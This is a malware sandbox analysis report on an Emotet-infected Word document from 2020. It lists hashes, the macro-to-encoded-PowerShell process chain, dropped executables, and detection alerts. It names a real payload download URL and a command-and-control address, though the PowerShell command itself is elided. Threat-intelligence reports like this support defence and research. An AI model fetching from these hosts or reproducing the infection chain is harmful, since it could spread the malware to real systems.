Field | Value
---|---
File name | 賞与支.doc
Full analysis | https://app.any.run/tasks/34961972-3773-42fb-8fcc-9f3926c6aa79
Verdict | Malicious activity
Threats | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become very destructive malware. It targets mostly corporate victims, but even private users get infected in mass spam email campaigns.
Analysis date | September 30, 2020, 00:54:09
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags | 
Indicators | 
MIME | application/msword
File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Tenetur., Author: Léo Boyer, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Sep 29 23:27:00 2020, Last Saved Time/Date: Tue Sep 29 23:27:00 2020, Number of Pages: 1, Number of Words: 3109, Number of Characters: 17727, Security: 8
MD5 | 1405F3D40ACED3D5BBE7153C4E186E9C
SHA1 | 379F779E590425EBFB4C6A4719069C26C9FD363D
SSDEEP | 1536:I/7iQQsfDqOxqr7OxDiGmrYL7+chKas7V7tq9jD4RuqM1VetqjpcSoUlM:ImQbfrUr74iH8Zcag7tWLytypXlM
SHA256 | C9EE15C0A0084232D9C7E2E5F5F2550F4CEC9E7455B65E0022929F58307B1BA2
Extension | Identified type (score)
---|---
.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)
Property | Value
---|---
CompObjUserType | Microsoft Word 97-2003 Document
CompObjUserTypeLen | 32
LocaleIndicator | 1033
CodePage | Unicode UTF-16, little endian
HeadingPairs | 
TitleOfParts | -
HyperlinksChanged | No
SharedDoc | No
LinksUpToDate | No
ScaleCrop | No
AppVersion | 15
CharCountWithSpaces | 20795
Paragraphs | 41
Lines | 147
Company | -
Security | Locked for annotations
Characters | 17727
Words | 3109
Pages | 1
ModifyDate | 2020:09:29 22:27:00
CreateDate | 2020:09:29 22:27:00
TotalEditTime | -
Software | Microsoft Office Word
RevisionNumber | 1
LastModifiedBy | -
Template | Normal.dotm
Comments | -
Keywords | -
Author | Léo Boyer
Subject | -
Title | Tenetur.
PID | CMD | Path | Indicators | Parent process | Process details
---|---|---|---|---|---
1336 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\賞与支.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000
3212 | POwersheLL -ENCOD [encoded command elided] | C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe | — | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2268 | "C:\Users\admin\Rq__np7\Om8ihdw\Mo0duikfr.exe" | C:\Users\admin\Rq__np7\Om8ihdw\Mo0duikfr.exe | — | POwersheLL.exe | User: admin; Company: Flex Inc.; Integrity Level: MEDIUM; Description: Replacement for the Masked Edit Control v 2.0.; Exit code: 0; Version: 2.8.0.3
2856 | "C:\Users\admin\AppData\Local\rasgcw\mfc120enu.exe" | C:\Users\admin\AppData\Local\rasgcw\mfc120enu.exe | — | Mo0duikfr.exe | User: admin; Company: Flex Inc.; Integrity Level: MEDIUM; Description: Replacement for the Masked Edit Control v 2.0.; Version: 2.8.0.3
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
1336 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR76A1.tmp.cvr | — | — | —
3212 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WJAEQ9NESQMMJZVRE3V3.temp | — | — | —
2268 | Mo0duikfr.exe | C:\Users\admin\AppData\Local\Temp\~DFB82E073EF44A011D.TMP | — | — | —
1336 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | D434B7C64380F438642058EEF63959A1 | A0FE63861AC3B48464A566E2DB5BF2F570E905EB9E7E991ABAEB932C4141DA68
1336 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 494F1A3E7D4E62C87D389760854A6B71 | C56CD81A0C2EBDA433EF8B1FF676C255DD13355C282D47E840DC6451C4BF872E
3212 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | D6EE8C34E4C28999F00E385C8808E7DE | 39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB
3212 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF228130.TMP | binary | D6EE8C34E4C28999F00E385C8808E7DE | 39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB
1336 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$賞与支.doc | pgc | 7A1708DD85C6991A77E2266110E4502C | 728DC9EE1ECB67B6A8C8691B27C3B4E2A22C04064D84E570CF1D1251E5D13A1A
2268 | Mo0duikfr.exe | C:\Users\admin\AppData\Local\rasgcw\mfc120enu.exe | executable | F05C83E9AAA1789BBF9E2122BC2ABFF1 | CBFEA69DD5DDF98AF616C47DE1BE54CFD3E0DEE219F3EFD4ED98F881AE1A76E7
3212 | POwersheLL.exe | C:\Users\admin\Rq__np7\Om8ihdw\Mo0duikfr.exe | executable | F05C83E9AAA1789BBF9E2122BC2ABFF1 | CBFEA69DD5DDF98AF616C47DE1BE54CFD3E0DEE219F3EFD4ED98F881AE1A76E7
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2856 | mfc120enu.exe | POST | 200 | 116.91.240.96:80 | http://116.91.240.96/GZKgvD/ | JP | binary | 132 b | malicious |
3212 | POwersheLL.exe | GET | 200 | 164.132.10.28:80 | http://parlayjudibola.com/wp-includes/X/ | PT | executable | 400 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2856 | mfc120enu.exe | 116.91.240.96:80 | — | ARTERIA Networks Corporation | JP | malicious |
3212 | POwersheLL.exe | 164.132.10.28:80 | parlayjudibola.com | OVH SAS | PT | suspicious |
Domain | IP | Reputation
---|---|---
parlayjudibola.com | — | suspicious
PID | Process | Class | Message |
---|---|---|---|
3212 | POwersheLL.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3212 | POwersheLL.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3212 | POwersheLL.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2856 | mfc120enu.exe | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M10 |